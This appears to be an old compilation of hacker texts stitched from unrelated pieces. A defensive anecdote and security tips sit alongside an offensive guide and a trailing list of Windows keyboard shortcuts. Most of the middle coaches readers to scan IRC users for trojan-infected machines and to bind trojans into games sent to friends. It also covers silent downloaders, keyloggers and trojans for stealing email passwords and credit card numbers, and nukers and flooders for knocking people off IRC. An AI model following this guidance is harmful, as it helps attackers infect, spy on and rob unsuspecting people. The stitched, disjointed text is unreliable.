My friend was setting up a webserver once. His first time too, and he wasn't to anxious to set up some good software to protect against hackers and viruses. He didn't put up one IDS, and before you know it, the obvious happened. But this time, a newbie had struck. The nice log files showed, bluntly across the screen, multiple instances of a foreign IP address that stood out. Some stupid newbie had tried to login as "uucp" on my friend's XP computer, with a password of "uucp." Well, that's great, but he also had tried the same user/pass combination three times, enough to get himself logged nicely. Even a semi-brainless user with some form of neurological system knows that uucp isn't a default XP account. Again, excitement toiled this hacker's brain, and maybe if he hadn't done that, along with a few other stupid things, he wouldn't have gotten caught. What other things did he do? Well, lets see. He openned 35 instances of MS-DOS. He tried to clean the printer's heads, and he edited a .gif in notepad. Then he uninstalled a few programs and installed some html editor, and replaced four files with the words "14P."

He might as well have posted his phone number. In a few days, we had tracked him down to a suburban town in Ohio. We let him go, not

pressing any charges, because he had done nothing really damaging and had provided me with an example of a moron for this guide.

Tip 3: Don't go crazy if you lose data. Chances are, if it was that important, you would have backed it up anyway. Most hackers nowadays wish they were back in 1989 when they could use a Black Box and having a Rainbow Book actually meant something. Most hackers aren't blackhat, they are whitehat, and some even greyhat. But in the end, most hackers that are in systems aren't satisfied by looking around. From past experiences, I have concluded that many hackers like to remember where've they been. So, what do they do? They either press delete here and there, or copy some files onto their systems. Stupid hackers (yes, there are plenty of stupid hackers) send files to e-mail addresses. Some free email companies will give you the IP of a certain e-mail address's user if you can prove that user has been notoriously hacking you. But most of the time, by the time you get the e-mail addy it's been unused for weeks if not months or years, and services like hotmail have already deleted it.

Tip 4: Save information! Any information that you get from a log file (proxy server IP, things like "14P", e-mail addresses that things were sent to, etc.) should be saved to a floppy disk (they're not floppy anymore, I wish I could get out of the habit of calling them that) incase there's a next time. If you get another attack, from the same proxy, or with similar e-mail addresses (e.g: one says Blackjack 123@something.whatever and the other says Black_jack_45@something.znn.com) you can make an assumption that these hackers are the same people. In that case, it would probably be worth the effort to resolve the IP using the proxy and do a traceroute. Pressing charges is recommended if this is a repeat offender.

Tip 5: Don't be stupid. If you've been hacked, take security to the next level. Hackers do talk about people they've hacked and they do post IPs and e-mail addresses. Proof? Take a look at Defcon Conventions. I've never gone to one, but I've seen the photos. The "Wall of Shame"-type of boards I've seen have IPs and e-mail addresses written all over them in fat red, dry-erase ink. Don't be the one to go searching the Defcon website and find your e-mail address posted on the Wall of Shame board!

Tip 6: Don't rely on luck. Chances are, sometime or another, you're going to be targeted for an attack. Here you can rely on luck. Maybe they'll forget? Maybe they don't know how to do it? If you think this way, a surprise is going to hit your face very hard. Another way you could stupidly rely on luck is by saying this: It's probably just a whitehat. On the contrary, my friend, it's probably just a blackhat. A blackhat with knowledge stored in his head, ready to be used as an ax. It's your data. You take the chance.

- Scan for an open port - infected trojan user -

Scanning ranges of networks

Well , you can try lets say Trojan Hunter from the Ip scanners section to scan for a range of IP addresses lets say 212.212.*.* , where * is all the numbers in network or 212.212.212.* for a smaller more specified scann i will be soon adding the IP bible so you can find out which IP addresses apear in lets say asia , or europe , or greece , or a city , or the village where i am from and scan all the online users from that place , i promise i will add it as soon i find it again(lost it in a drive format while playing around with some viruses)

Scanning mIRC chat channels Why scan irc channels? Just because there are some really big irc channels with 1000+ or 500+ users and thats a nice IP recourse of ready to scan IP addresses i strongly recommend you to download IRC Scanner v1.0 by RG its a great tool to gather all the channels ursers IP addresses and scans them in seconds at the port you choose in the beggining of the scan

- Trojan ports list -

TCP 1 Breach.2001, SocketsDeTroie.230, SocketsDeTroie.250 TCP 28 Amanda.200 TCP 31 MastersParadise.920 TCP 68 Subseven.100 TCP 142 NetTaxi.180 TCP 146 Infector.141, Intruder.100, Intruder.100 TCP 171 ATrojan.200 TCP 285 WCTrojan.100 TCP 286 WCTrojan.100 TCP 334 Backage.310 TCP 370 NeuroticKat.120, NeuroticKat.130 TCP 413 Coma.109 TCP 420 Breach.450 TCP 555 Id2001.100, PhaseZero.100, StealthSpy.100 TCP 623 Rtb666.160 TCP 660 Zaratustra.100 TCP 661 Noknok.800, Noknok.820 TCP 666 BackConstruction.210, BackConstruction.250, Bla.100, Bla.200, Bla.400, Bla.503, Cain.150, Dimbus.100, Noknok.820, Ripper.100, SatansBackdoor.100, SatansBackdoor.101, SatansBackdoor.102, Unicorn.100, Unicorn.101, Unicorn.110 TCP 667 SniperNet.210, Snipernet.220 TCP 668 Unicorn.101, Unicorn.110 TCP 680 Rtb666.160 TCP 777 Tiny.100, Undetected.230, Undetected.300, Undetected.310, Undetected.320, Undetected.330, Undetected.331, Undetected.332 TCP 785 NetworkTerrorist.100 TCP 800 NeuroticKitten.010 TCP 831 NeuroticKat.100, NeuroticKat.120, NeuroticKat.130 TCP 901 NetDevil.130, NetDevil.140 TCP 1000 DerSpaeher.200 TCP 1001 Silencer.100

TCP 1008 AutoSpy.100 TCP 1010 DerSpaeher.200 TCP 1015 Doly.150 TCP 1111 TPort.100 TCP 1130 Noknok.800, Noknok.820 TCP 1207 SoftWAR.100 TCP 1243 Subseven.100, SubSeven.110, SubSeven.180, SubSeven.190, Subseven.200 TCP 1245 VoodooDoll.006 TCP 1269 Matrix.130 TCP 1480 RemoteHack.130 TCP 1568 RemoteHack.100, RemoteHack.110 TCP 1600 DirectConnection.100 TCP 1601 DirectConnection.100 TCP 1602 DirectConnection.100 TCP 1634 NetCrack.100 TCP 1784 Snid.120, Snid.212 TCP 1999 TransmissionScout.100, TransmissionScout.110 TCP 2000 ATrojan.200, InsaneNetwork.400 TCP 2001 DIRT.220, TrojanCow.100 TCP 2003 TransmissionScout.100, TransmissionScout.110 TCP 2023 RipperPro.100 TCP 2040 InfernoUploader.100 TCP 2115 Bugs.100 TCP 2140 DeepThroat.100, DeepThroat.200, DeepThroat.310 TCP 2332 SilentSpy.202 TCP 2589 Dagger.140 TCP 2600 DigitalRootbeer.100 TCP 2989 Rat.200 TCP 3128 MastersParadise.970 TCP 3129 MastersParadise.920, MastersParadise.970 TCP 3150 DeepThroat.100, DeepThroat.200, DeepThroat.310, MiniBacklash.110 TCP 3215 BlackStar.100, Ghost.230 TCP 3333 Daodan.123 TCP 3410 OptixPro.100, OptixPro.110 TCP 3456 Force.155, TerrorTrojan.100 TCP 3505 AutoSpy.130, AutoSpy.140 TCP 3586 Snid.120, Snid.212 TCP 3700 PortalOfDoom.100 TCP 3723 Mantis.100 TCP 3800 Eclypse.100 TCP 3996 RemoteAnything.364 TCP 4000 SkyDance.220, SkyDance.229 TCP 4201 Wartrojan.160, Wartrojan.200 TCP 4225 SilentSpy.202 TCP 4321 Bobo.100 TCP 4444 AlexTrojan.200, Crackdown.100 TCP 4488 EventHorizon.100 TCP 4523 Celine.100 TCP 4545 InternalRevise.100, RemoteRevise.150

TCP 4567 FileNail.100 TCP 4666 Mneah.100 TCP 4950 ICQTrojan.100 TCP 5005 Aladino.060 TCP 5025 Keylogger.WMRemote.100 TCP 5031 NetMetro.104 TCP 5032 NetMetro.104 TCP 5033 NetMetro.104 TCP 5050 RoxRat.100 TCP 5151 OptixLite.020, OptixLite.030, OptixLite.040 TCP 5190 MBomber.100 TCP 5277 WinShell.400 TCP 5343 WCRat.100 TCP 5400 BackConstruction.120, BackConstruction.150, BladeRunner.080, DeepThroat.300 TCP 5401 BackConstruction.120, BackConstruction.150, BackConstruction.210, BackConstruction.250, BladeRunner.080, DeepThroat.300, Mneah.100 TCP 5402 BackConstruction.210, BackConstruction.250, BladeRunner.080, DeepThroat.300, Mneah.100 TCP 5534 TheFlu.100 TCP 5550 XTCP.200, XTCP.201 TCP 5555 Noxcape.100, Noxcape.200 TCP 5695 Assassin.100 TCP 5714 WinCrash.100 TCP 5741 WinCrash.100 TCP 5742 WinCrash.103 TCP 5802 Y3KRat.160 TCP 5810 Y3KRat.160 TCP 5838 Y3KRat.170 TCP 5858 Y3KRat.110, Y3KRat.120, Y3KRat.140 TCP 5880 Y3KRat.140 TCP 5881 Y3KRat.110, Y3KRat.120, Y3KRat.140 TCP 5882 Y3KRat.100, Y3KRat.110, Y3KRat.120, Y3KRat.140, Y3KRat.150 TCP 5883 Y3KRat.110, Y3KRat.140 TCP 5884 Y3KRat.140, Y3KRat.150 TCP 5885 Y3KRat.110, Y3KRat.120, Y3KRat.140 TCP 5886 Y3KRat.120, Y3KRat.140 TCP 5887 Y3KRat.110, Y3KRat.120, Y3KRat.140 TCP 5888 Y3KRat.100, Y3KRat.110, Y3KRat.120, Y3KRat.140, Y3KRat.150 TCP 5889 Y3KRat.100, Y3KRat.110, Y3KRat.120, Y3KRat.140, Y3KRat.150 TCP 5890 Y3KRat.140 TCP 6400 Thething.100, Thething.150 TCP 6556 AutoSpy.120, AutoSpy.122 TCP 6655 Aqua.020

TCP 6660 LameSpy.095 TCP 6666 LameRemote.100, ProjectMayhem.100 TCP 6669 Vampire.100 TCP 6670 DeepThroat.200, DeepThroat.210 TCP 6671 DeepThroat.310 TCP 6699 HostControl.101 TCP 6711 DeepThroat.300, Noknok.820, SubSeven.180, SubSeven.190 TCP 6712 Subseven.100 TCP 6713 Subseven.100 TCP 6767 NTRC.120 TCP 6776 SubSeven.180, SubSeven.190, Subseven.200 TCP 6789 Doly.200 TCP 6796 SubSeven.214 TCP 6912 ShitHeep.100 TCP 6939 Indoctrination.100 TCP 6953 Lithium.100 TCP 6969 2000Cracks.100, Bigorna.100, Danton.110, Danton.210, Danton.220, Danton.310, Danton.320, Danton.330, GateCrasher.110, NetController.108, Sparta.110, VagrNocker.120 TCP 6970 Danton.330 TCP 7001 Freak88.100 TCP 7119 Massaker.100 TCP 7200 Massaker.110 TCP 7300 Coced.221 TCP 7301 Coced.221 TCP 7306 NetSpy.200, NetSpy.200 TCP 7410 Phoenix.190, Phoenix.200 TCP 7511 Genue.100 TCP 7609 Snid.120, Snid.212 TCP 7614 Wollf.130 TCP 7648 BlackStar.100, Ghost.230 TCP 7788 Last.2000, Matrix.200 TCP 7826 MiniOblivion.010, Oblivion.010 TCP 7887 SmallFun.110 TCP 7891 Revenger.100 TCP 7979 VagrNocker.200 TCP 7997 VagrNocker.200 TCP 8000 XConsole.100 TCP 8011 Way.240 TCP 8012 Ptakks.215, Ptakks.217 TCP 8110 LoseLove.100 TCP 8111 LoseLove.100 TCP 8301 LoseLove.100 TCP 8302 LoseLove.100 TCP 8372 NetBoy.100 TCP 8720 Connection.130 TCP 8734 AutoSpy.110 TCP 8811 Force.155 TCP 8899 Last.2000 TCP 9000 Aristotles.100 TCP 9301 LoseLove.100

TCP 9400 InCommand.100, InCommand.110, InCommand.120, InCommand.130, InCommand.140, InCommand.150, InCommand.153, InCommand.160, InCommand.167, InCommand.170 TCP 9401 InCommand.100, InCommand.110, InCommand.170 TCP 9402 InCommand.100, InCommand.110 TCP 9561 CRatPro.110 TCP 9563 CRatPro.110 TCP 9580 TheefLE.100 TCP 9696 Danton.210, Ghost.230 TCP 9697 Danton.320, Danton.330, Ghost.230 TCP 9870 R3C.100 TCP 9872 PortalOfDoom.100 TCP 9873 PortalOfDoom.100 TCP 9874 PortalOfDoom.100 TCP 9875 PortalOfDoom.100 TCP 9876 Rux.100, SheepGoat.100 TCP 9877 SmallBigBrother.020 TCP 9878 SmallBigBrother.020, TransmissionScout.100, TransmissionScout.110, TransmissionScout.120 TCP 9879 SmallBigBrother.020 TCP 9999 ForcedEntry.100, Infra.100, Prayer.120, Prayer.130, TakeOver.200, TakeOver.300 TCP 10001 DTr.130, DTr.140 TCP 10013 Amanda.200 TCP 10067 PortalOfDoom.100 TCP 10100 Gift.240 TCP 10101 NewSilencer.100 TCP 10167 PortalOfDoom.100 TCP 10528 HostControl.100, HostControl.260 TCP 10607 Coma.109 TCP 10666 Ambush.100 TCP 11011 Amanda.200 TCP 11050 HostControl.101 TCP 11051 HostControl.100, HostControl.260 TCP 11223 AntiNuke.100, Progenic.100, Progenic.110 TCP 11225 Cyn.100, Cyn.103, Cyn.120 TCP 11306 Noknok.800, Noknok.820 TCP 11831 Katux.200, Latinus.140, Latinus.150, Pest.100, Pest.400 TCP 11991 PitfallSurprise.100 TCP 12043 Frenzy.2000 TCP 12345 Fade.100, Netbus.160, Netbus.170, VagrNocker.400 TCP 12346 Netbus.160, Netbus.170 TCP 12348 Bionet.210, Bionet.261, Bionet.280, Bionet.302, Bionet.305, Bionet.311, Bionet.313, Bionet.316, Bionet.317 TCP 12349 Bionet.084, Bionet.261, Bionet.280, Bionet.302, Bionet.305, Bionet.311, Bionet.313, Bionet.314, Bionet.316, Bionet.317, Bionet.401,

Bionet.402 TCP 12389 KheSanh.210 TCP 12478 Bionet.210 TCP 12623 Buttman.090, Buttman.100 TCP 12624 Buttman.090, Buttman.100 TCP 12625 Buttman.100 TCP 12904 Akropolis.100, Rocks.100 TCP 13473 Chupacabra.100 TCP 13753 AFTP.010 TCP 14100 Eurosol.100 TCP 14194 CyberSpy.840 TCP 14286 HellDriver.100 TCP 14500 PCInvader.050, PCInvader.060, PCInvader.070 TCP 14501 PCInvader.060, PCInvader.070 TCP 14502 PCInvader.050, PCInvader.060, PCInvader.070 TCP 14503 PCInvader.050, PCInvader.060, PCInvader.070 TCP 14504 PCInvader.050, PCInvader.060 TCP 15092 HostControl.100, HostControl.260 TCP 15382 SubZero.100 TCP 15432 Cyn.210 TCP 15555 ICMIBC.100 TCP 16322 LastDoor.100 TCP 16484 MoSucker.110 TCP 16661 Dfch.010 TCP 16969 Progenic.100 TCP 16982 AcidShiver.100 TCP 17300 Kuang.200 TCP 17499 CrazzyNet.370, CrazzyNet.375, CrazzyNet.521 TCP 17500 CrazzyNet.370, CrazzyNet.375, CrazzyNet.521 TCP 17569 Infector.141, Infector.160, Infector.170, Infector.180, Infector.190, Infector.200, Intruder.100, Intruder.100 TCP 17593 AudioDoor.120 TCP 19191 BlueFire.035, BlueFire.041 TCP 19604 Metal.270 TCP 19605 Metal.270 TCP 19991 Dfch.010 TCP 20000 Millenium.100 TCP 20001 Millenium.100, PshychoFiles.180 TCP 20002 AcidKor.100, PshychoFiles.180 TCP 20005 MoSucker.200, MoSucker.210, MoSucker.220 TCP 21212 Schwindler.182 TCP 21554 Exploiter.100, Exploiter.110, Girlfriend.130, GirlFriend.135 TCP 21579 Breach.2001 TCP 21584 Breach.2001 TCP 21684 Intruse.134 TCP 22068 AcidShiver.110 TCP 22115 Cyn.120 TCP 22222 Prosiak.047, Ruler.141, Rux.300,

Rux.400, Rux.500, Rux.600 TCP 22223 Rux.400, Rux.500, Rux.600 TCP 22456 Bla.200, Bla.503 TCP 22457 AcidShiver.120, Bla.200, Bla.503 TCP 22784 Intruzzo.110 TCP 22845 Breach.450 TCP 22847 Breach.450 TCP 23005 Infinaeon.110, NetTrash.100, Oxon.110, WinRat.100 TCP 23006 Infinaeon.110, NetTrash.100, Oxon.110, WinRat.100 TCP 23032 Amanda.200 TCP 23432 Asylum.010, Asylum.012, Asylum.013, Asylum.014, MiniAsylum.110 TCP 23456 EvilFTP.100, VagrNocker.400 TCP 23476 DonaldDick.153, DonaldDick.154, DonaldDick.155 TCP 23477 DonaldDick.153 TCP 24000 Infector.170 TCP 24307 Wildek.020 TCP 25386 MoonPie.220 TCP 25486 MoonPie.220 TCP 25555 FreddyK.100, FreddyK.200 TCP 25556 FreddyK.100 TCP 25685 MoonPie.010, MoonPie.012, MoonPie.130, MoonPie.220, MoonPie.240, MoonPie.400 TCP 25686 MoonPie.135, MoonPie.200, MoonPie.400 TCP 25982 MoonPie.135, MoonPie.200 TCP 26274 Delta.050 TCP 27160 MoonPie.135, MoonPie.200 TCP 27184 Alvgus.100, Alvgus.800 TCP 27374 Muerte.110, Subseven.210, SubSeven.213 TCP 28429 Hack'a'Tack.2000 TCP 28430 Hack'a'Tack.2000 TCP 28431 Hack'a'Tack.2000 TCP 28432 Hack'a'Tack.2000 TCP 28433 Hack'a'Tack.2000 TCP 28434 Hack'a'Tack.2000 TCP 28435 Hack'a'Tack.2000 TCP 28436 Hack'a'Tack.2000 TCP 29559 DuckToy.100, DuckToy.101, Katux.200, Latinus.140, Latinus.150, Pest.100, Pest.400 TCP 29891 Unexplained.100 TCP 30000 Infector.170 TCP 30001 Error32.100 TCP 30003 LamersDeath.100 TCP 30029 AOLTrojan.110 TCP 30100 NetSphere.127, NetSphere.130, NetSphere.131 TCP 30101 NetSphere.127, NetSphere.130, NetSphere.131 TCP 30102 NetSphere.127, NetSphere.130,

NetSphere.131 TCP 30103 NetSphere.131 TCP 30947 Intruse.134 TCP 31320 LittleWitch.400, LittleWitch.420 TCP 31337 BackOrifice.120, Khaled.100, OPC.200 TCP 31415 Lithium.101 TCP 31416 Lithium.100, Lithium.101 TCP 31557 Xanadu.110 TCP 31631 CleptoManicos.100 TCP 31745 Buschtrommel.100, Buschtrommel.122 TCP 31785 Hack'a'Tack.100, Hack'a'Tack.112 TCP 31787 Hack'a'Tack.100, Hack'a'Tack.112 TCP 31789 Hack'a'Tack.100, Hack'a'Tack.112 TCP 31791 Hack'a'Tack.100, Hack'a'Tack.112 TCP 31887 BDDT.100 TCP 31889 BDDT.100 TCP 32100 ProjectNext.053 TCP 32418 AcidBattery.100 TCP 32791 Akropolis.100, Rocks.100 TCP 33291 RemoteHak.001 TCP 33333 Blackharaz.100, Prosiak.047, SubSeven.214 TCP 33577 SonOfPsychward.020 TCP 34324 TelnetServer.100 TCP 34763 Infector.180, Infector.190, Infector.200 TCP 35000 Infector.190, Infector.200 TCP 35600 Subsari.140 TCP 36794 BugBear.100 TCP 37237 Mantis.020 TCP 37651 YAT.210 TCP 37653 YAT.310 TCP 40308 Subsari.140 TCP 40412 TheSpy.100 TCP 40421 MastersParadise.970 TCP 40422 MastersParadise.970 TCP 40999 DiemsMutter.110, DiemsMutter.140 TCP 41626 Shah.100 TCP 44444 Prosiak.070 TCP 45673 Akropolis.100, Rocks.100 TCP 47262 Delta.050 TCP 48006 Fragglerock.200 TCP 49683 HolzPferd.210 TCP 50000 Infector.180 TCP 50130 Enterprise.100 TCP 50766 Fore.100 TCP 51234 Cyn.210 TCP 51966 Cafeini.080, Cafeini.110 TCP 54321 PCInvader.010 TCP 57341 NetRaider.100 TCP 57922 Bionet.084 TCP 58008 Tron.100 TCP 58009 Tron.100 TCP 59090 AcidReign.200

TCP 59211 DuckToy.100, DuckToy.101 TCP 59345 NewFuture.100 TCP 60000 DeepThroat.300, MiniBacklash.100, MiniBacklash.101, MiniBacklash.101 TCP 60411 Connection.100, Connection.130 TCP 60412 Connection.130 TCP 60552 RoxRat.100 TCP 63536 InsaneNetwork.500 TCP 63878 AphexFTP.100 TCP 63879 AphexFTP.100 TCP 64969 Lithium.100 TCP 65000 Socket.100 UDP 1 SocketsDeTroie.250 UDP 666 Bla.200, Bla.400, Bla.503, Noknok.820 UDP 1130 Noknok.800, Noknok.820 UDP 2140 DeepThroat.100, DeepThroat.200, DeepThroat.310 UDP 2989 Rat.200 UDP 3128 MastersParadise.970 UDP 3129 MastersParadise.920, MastersParadise.970 UDP 3150 DeepThroat.100, DeepThroat.200, DeepThroat.310, MiniBacklash.110 UDP 3333 Daodan.123 UDP 3800 Eclypse.100 UDP 3996 RemoteAnything.364 UDP 4000 RemoteAnything.364 UDP 5555 Daodan.123 UDP 5881 Y3KRat.110, Y3KRat.140 UDP 5882 Y3KRat.100, Y3KRat.110, Y3KRat.120, Y3KRat.140, Y3KRat.150 UDP 5883 Y3KRat.110, Y3KRat.140 UDP 5884 Y3KRat.140, Y3KRat.150 UDP 5885 Y3KRat.110, Y3KRat.120, Y3KRat.140 UDP 5886 Y3KRat.120, Y3KRat.140 UDP 5887 Y3KRat.110, Y3KRat.120, Y3KRat.140 UDP 5888 Y3KRat.100, Y3KRat.110, Y3KRat.120, Y3KRat.150 UDP 6953 Lithium.100 UDP 8012 Ptakks.217 UDP 10067 PortalOfDoom.100 UDP 10167 PortalOfDoom.100 UDP 10666 Ambush.100 UDP 11225 Cyn.100, Cyn.103, Cyn.120 UDP 11306 Noknok.800, Noknok.820 UDP 12389 KheSanh.210 UDP 12623 Buttman.090, Buttman.100 UDP 12625 Buttman.100 UDP 14100 Eurosol.100 UDP 23476 DonaldDick.155 UDP 26274 Delta.050 UDP 27184 Alvgus.100 UDP 28431 Hack'a'Tack.2000

UDP 28432 Hack'a'Tack.2000 UDP 28433 Hack'a'Tack.2000 UDP 28434 Hack'a'Tack.2000 UDP 28435 Hack'a'Tack.2000 UDP 28436 Hack'a'Tack.2000 UDP 29891 Unexplained.100 UDP 30103 NetSphere.131 UDP 31320 LittleWitch.400, LittleWitch.420 UDP 31337 BackOrifice.120, OPC.200 UDP 31416 Lithium.100, Lithium.101 UDP 31789 Hack'a'Tack.100, Hack'a'Tack.112 UDP 31791 Hack'a'Tack.100, Hack'a'Tack.112 UDP 33333 Blackharaz.100 UDP 47262 Delta.050 UDP 49683 HolzPferd.210 UDP 60000 MiniBacklash.100

- Scan for an open port - infected trojan user -

- Get an IP address -

A little hand for the newbies-lamers here.

Find an msn messengers contact IP address The only way i know to do that is to send to the contact a file while he is online , send him/her a photo or something else , doing that a peer-to-peer connection opens while your friend gets the file/photo no matter what it is , make sure that you have a DOS Prompt open (located at:start > programs > MS-DOS Prompt) and type the command: netstat while sending them the file and you will see a list in the DOS Prompt of all the connections your computer has that time , one of them must be your friend that is receiving the file.If i hear about an other easier way that

you get it without sending files be sure i will post it here.

Find an IP though mIRC chat channels There is the /dns nickname command in irc but some people use proxies or shells and you cant see their real address,how do you know if the user uses a web-shell or a proxy? well... guess that yourself while looking the ip you got from the /dns nickname command , make sure you check out IRC Scanner v1.0 by RG in our programming section and in IP scanners section , its the best and fastest way to scan the users in IRC channels.

Get your friends IP address by sending them to your page Build a simple site in geocities or anywhere else , then go t http://www.stats4all.com and create an account , they provide free website statistics , add their code to your site and tell your friend to check out a cool page you just made , when he visits the page his IP will be logged in stats4all.com so after your friend visits your page check out your stats in stats4all.com and you will find the last 5 visitors at the left of the stats page , your friends IP included.

- How a trojan works in a few

words -

What the fuck is a trojan? A Trojan is a Remote Admin Tool , there is a server that runs invisible on the victim and the client that you run on your computer to take control of the victim ,you cant connect to the victim if he hasnt run the file yet ,there are many trojans around with different commands , layouts , extras ect , the trojans usually include a server builder that its safe to run on your computer you can browse to the server.exe and edit some options , like passwords or ports before sendin it...

How it works When the victim runs the server.exe the server runs invisible on the victim ,he doesnt see anything.The server keeps a port open lets say 27374 port and waits for a connection , some

servers of some trojans may have passwords in that case the server is stand by for a connection and a password , when you log into the victim the server enables you to run many commands by pressing buttons in your client ,the trojans were made to run those commands faster by pressing buttons.

Antiviruses All the antiviruses like Mc Affee ,Norton ect will identify like a virus and try to delete all the trojan servers you plan to send to your victims , also all the trojan clients even the server editor all the trojans are identified like viruses with all their files so dont send me e-mails tellin me my files are infected ! they are not infected , they are the original viruses and you wont get any troubles if you know what you are doin.

What to do with a trojan Another question you keep askin me how to use a trojan and what to do with it ... You can play with it , open the cds and laugh like stupid that you are , or redirect ports for other purposes , enable keyloggers and get the passwords , log on into their mails , who knows , you might key-log their gredit card numbers ...you can make them log in irc servers like bots to see whos online and a lot more

- Some ways to infect someone

with a virus or a trojan -

Bind 2 exes (infect a game or any other .exe with your virus/trojan) A simple thing to do is bind a game with the virus or trojan , lets say you have game.exe and server.exe , there are some programs that will add server.exe into game.exe , so when the program connects those two files it gives you a file.exe that will have both game and server in it , send it to your friends and say its just a game , binder is the program you need to connect these file and can be found in Trojans/Backdoors section.

Send them a downloader

A downloader will automaticaly download AND execute any file from the internet on the victims computer as soon as they open the downloader,here it goes:a downloader is 2-4 Kb only! it can be added in a game.exe with the way above,you have to upload your trojan/virus on a server lets say geocities then you set up the downloader to download and run this file,you send the 4Kb file to the victim and as soon his computer runs the file it starts downloading the trojan/virus from geocities,the victim will see nothin, the VIR SCANNERS CANT SEE IT BUT they will detect the trojan/virus that it will download.Downloader is what you are lookin for and can be found in Trojans/Backdoors section.

Infected webpage (.EML Bug) Another way is to build a webpage that contains a virus and infects the visitors with explorer 5.01-5.5 versions with any virus , i havent test it yet and i am not sure if and how it works but i have seen programs around that promt you to choose a trojan/virus then it decodes it and the it gives you the html that contains the virus the problem is that it takes long time to decode it and its better if your virus is 1-30Kb other ways it ll take days to decode , as i said i havent test it yet and i wont be able to write more or reply to any emails askin for it.

Best way (if you have access on the victims pc) Get a floppy disc and do the job :-)

- The only ways to hack hotmail -

Well i guess that trying to hack hotmail is impossible but if there is a way it should be one of those: Way #1 : Keylogger A keylogger copies all the buttons pressed by the victim in a .txt file,all you need is access to the victims PC with a trojan or even go there with a disc ,this is one of the best ways to get his user-password and log in his account and many more things! Way #2 : Trojan Some trojans have an option that gets the victims passwords and usernames by pressin a button ,all you have to do is infect him ... (not all of the

victims will have the auto-coplete on so this will wont work 100%) Way #3 : MSN proggies There are some MSN programs for that job (like furax), you send to your friend/victim a file thats 12Kb and when they run it (ask them if they did someway) you type a command in yours-theirs chat window and it logs them off , when they log in again the program will have the username and the password , you type another command in the chat MSN chat window again and the victim sends you automaticaly (and invisible) the user and the password.I guess Furax doesnt work now but there are new versions that do the same job. Way #4 :Brute Forcer Called brute forcers , some programs made to send multiple password or user/password request to a server, untill they get the right password for the username!This way might take long or might not work at all with Hotmail now but who knows?There are other sites too

- Nuke people from IRC -

...Ok 40% of the followin will work

Nuker Click 2.2

There is a nuker that will attemp to disconnect the victim from the irc server, you perform the /whois nickname command to the victim and you

will get : Nickname is username@ppp-208-138-219-60.coqui.net * kyk Nickname on @#Astynomia @#night_vision #mp3 #hellas Nickname using nini.irc.gr Nickname End of /WHOIS list. This is the /whois nickname command result , in yellow you see the host of the victim and in green you see the server that the victim uses , you need to add those in the nuker and press the button , you cant see which port the victim uses but the default is 6667 ,some networks mask your real hostname so you wont be able to use this nuker there, i v tested zone alarm and it detects and stop this attack something that black ICE just lets in and nuke you,i dont quarranty you that will work , it worked for me 70% of times on Gr-Net (nini.irc.gr).What you are lookin for is Click 2.2 and can be found in [Nukers-Flooders] section.

Flooder There are some cool flooders that all they do is connect clones (many fake irc users commin from your pc) in the network and priv-message a user , that causes excess flood quit :-) there is also a choise on the flooder that you can message a whole channel, i still remember gettin in #mp3 and flooding the !list command in the channel with 50 clones , all the F-Servs were down , and the channel was f***ed up.

Best Keyboard Shortcuts

acessability shortcuts Right SHIFT for eight seconds........ Switch FilterKeys on and off. Left ALT +left SHIFT +PRINT SCREEN....... Switch High Contrast on and off. Left ALT +left SHIFT +NUM LOCK....... Switch MouseKeys on and off. SHIFT....... five times Switch StickyKeys on and off. NUM LOCK...... for five seconds Switch ToggleKeys on and off. explorer shortcuts END....... Display the bottom of the active window. HOME....... Display the top of the active window. NUM LOCK+ASTERISK....... on numeric keypad (*) Display all subfolders under the selected folder. NUM LOCK+PLUS SIGN....... on numeric keypad (+) Display the contents of the selected folder. NUM LOCK+MINUS SIGN....... on numeric keypad (-) Collapse the selected folder. LEFT ARROW...... Collapse current selection if it's expanded, or select parent folder. RIGHT ARROW....... Display current selection if it's collapsed, or select first subfolder. Type the following commands in your Run Box (Windows Key + R) or Start Run devmgmt.msc = Device Manager msinfo32 = System Information cleanmgr = Disk Cleanup ntbackup = Backup or Restore Wizard (Windows Backup Utility) mmc = Microsoft Management Console excel = Microsoft Excel (If Installed) msaccess = Microsoft Access (If Installed) powerpnt = Microsoft PowerPoint (If Installed) winword = Microsoft Word (If Installed) frontpg = Microsoft FrontPage (If Installed) notepad = Notepad wordpad = WordPad calc = Calculator msmsgs = Windows Messenger mspaint = Microsoft Paint wmplayer = Windows Media Player rstrui = System Restore netscp6 = Netscape 6.x netscp = Netscape 7.x netscape = Netscape 4.x waol = America Online control = Opens the Control Panel control printers = Opens the Printers Dialog

Getting used to using your keyboard exclusively and leaving your mouse behind will make you much more efficient at performing any task on any Windows system. I use the following keyboard shortcuts every day: Windows key + R = Run menu This is usually followed by: cmd = Command Prompt iexplore + "web address" = Internet Explorer compmgmt.msc = Computer Management dhcpmgmt.msc = DHCP Management dnsmgmt.msc = DNS Management services.msc = Services eventvwr = Event Viewer dsa.msc = Active Directory Users and Computers dssite.msc = Active Directory Sites and Services Windows key + E = Explorer ALT + Tab = Switch between windows ALT, Space, X = Maximize window CTRL + Shift + Esc = Task Manager Windows key + Break = System properties Windows key + F = Search Windows key + D = Hide/Display all windows CTRL + C = copy CTRL + X = cut CTRL + V = paste Also don't forget about the "Right-click" key next to the right Windows key on your keyboard. Using the arrows and that key can get just about anything done once you've opened up any program. Keyboard Shortcuts [Alt] and [Esc] Switch between running applications [Alt] and letter Select menu item by underlined letter [Ctrl] and [Esc] Open Program Menu [Ctrl] and [F4] Close active document or group windows (does not work with some applications) [Alt] and [F4] Quit active application or close current window [Alt] and [-] Open Control menu for active document Ctrl] Lft., Rt. arrow Move cursor forward or back one word Ctrl] Up, Down arrow Move cursor forward or back one paragraph [F1] Open Help for active application Windows+M Minimize all open windows Shift+Windows+M Undo minimize all open windows Windows+F1 Open Windows Help Windows+Tab Cycle through the Taskbar buttons Windows+Break Open the System Properties dialog box

Use these keyboard shortcuts for dialog boxes: Move forward through tabs. CTRL+TAB Move backward through tabs. CTRL+SHIFT+TAB Move forward through options. TAB Move backward through options. SHIFT+TAB Carry out the corresponding command or select the corresponding option. ALT+Underlined letter Carry out the command for the active option or button. ENTER Select or clear the check box if the active option is a check box. SPACEBAR Select a button if the active option is a group of option buttons. Arrow keys Display Help. F1 Display the items in the active list. F4 Open a folder one level up if a folder is selected in the Save As or Open dialog box. BACKSPACE If you have a Microsoft Natural Keyboard, or any other compatible keyboard that includes the Windows logo key and the Application key , you can use these keyboard shortcuts: Display or hide the Start menu. WIN Key Display the System Properties dialog box. WIN Key+BREAK Show the desktop. WIN Key+D Minimize all windows. WIN Key+M Restores minimized windows. WIN Key+Shift+M Open My Computer. WIN Key+E Search for a file or folder. 